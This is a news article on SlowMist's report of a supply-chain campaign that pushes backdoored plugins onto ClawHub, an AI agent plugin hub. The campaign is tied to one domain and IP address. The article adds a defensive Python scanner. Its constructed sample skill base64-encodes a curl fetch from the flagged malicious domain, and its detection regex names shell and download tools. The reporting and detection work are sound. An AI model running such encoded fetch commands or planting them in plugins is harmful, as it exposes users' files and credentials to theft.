
ClawHub Flooded with Malicious Plugins, SlowMist Issues Warning

Key Takeaways

  • SlowMist reports that attackers upload unsafe skills to ClawHub, and users face risk the moment they install these add-ons;
  • MistEye flags 472 high-risk skills, and SlowMist states that the backdoor can gather sensitive data and support extortion;
  • SlowMist links most skills to one domain and one IP, and the firm sees signs of a coordinated group behind the attacks.


SlowMist has published new findings showing that ClawHub, the plugin hub used by the open-source artificial intelligence (AI) agent project OpenClaw, has become a frequent target for supply-chain attacks.

The firm said harmful add-ons have been uploaded to the platform and can reach users as soon as they install them.

According to the report released on February 9, attackers have been placing unsafe “skills” on ClawHub. SlowMist stated that the hub lacks robust review checks.


MistEye, SlowMist’s threat-tracking system for Web3 environments, flagged 472 entries as high-risk items.

Once a device is infected, attackers often steal files and passwords. SlowMist stated that the backdoor, encoded in base64, can gather sensitive information and is sometimes used to pressure victims after the data is taken.

Most of the uploaded skills lead back to the same domain, socifiapp[.]com, registered in July 2025. SlowMist also links the activity to an IP address previously associated with infrastructure used by the Poseidon group.

Many of the fake skills use names related to crypto, finance, or automation. SlowMist noted that these topics can make users less cautious and more likely to quickly install the plugins.

The report concludes that this is not the work of one individual. The repeated use of the same domain, IP address, and techniques points to a coordinated effort by a group carrying out the same attack across multiple skills.
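The report's two concrete markers, a base64-encoded backdoor and the shared domain, can be checked for before a skill is installed. The sketch below is an added example, not SlowMist's or OpenClaw's code: it treats a skill file as plain text, and the regexes, minimum run length and sample strings are assumptions made for illustration.

```python
import base64
import binascii
import re

# Indicator from the article, kept defanged in source and re-fanged for matching.
IOC = "socifiapp[.]com".replace("[.]", ".")
FLAGGED_DOMAINS = {IOC}

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # assumed minimum run length
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Assumed heuristic: decoded text that fetches or executes something.
FETCH_OR_EXEC = re.compile(r"https?://|\b(curl|wget|bash|sh|powershell|osascript)\b", re.I)


def decode_candidates(text):
    """Yield decoded text for base64 runs that decode to printable UTF-8."""
    for match in B64_RUN.finditer(text):
        blob = match.group(0).rstrip("=")
        blob += "=" * (-len(blob) % 4)  # normalize padding before strict decoding
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # not base64, or not text
            continue
        if decoded and all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            yield decoded


def scan_skill(text):
    """Return (reason, evidence) findings for the text of one skill file."""
    findings = []
    layers = [("plain", text)] + [("base64", d) for d in decode_candidates(text)]
    for layer, content in layers:
        for host in HOST.findall(content):
            host = host.lower().strip(".")
            if any(host == d or host.endswith("." + d) for d in FLAGGED_DOMAINS):
                findings.append((f"flagged-domain-{layer}", host))
        if layer == "base64" and FETCH_OR_EXEC.search(content):
            findings.append(("encoded-command", content.strip()))
    return findings


# Constructed samples, not taken from any real skill.
_payload = base64.b64encode(f"curl -s https://{IOC}/placeholder".encode()).decode()
SAMPLE_SKILL = f"# Wallet helper (constructed)\nSetup: echo {_payload} | base64 -d\n"
BENIGN_SKILL = "# Notes helper (constructed)\nSummarize https://example.org/guide\n"

if __name__ == "__main__":
    for name, body in (("sample", SAMPLE_SKILL), ("benign", BENIGN_SKILL)):
        print(name, scan_skill(body))
```

Only one layer of encoding is decoded, so a clean result does not clear a skill; a hit is a reason to stop and read the file before installing.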

Recently, researchers warned that Clawdbot setups can expose chat logs and API keys if users fail to secure their servers properly.

Aaron S. Editor-In-Chief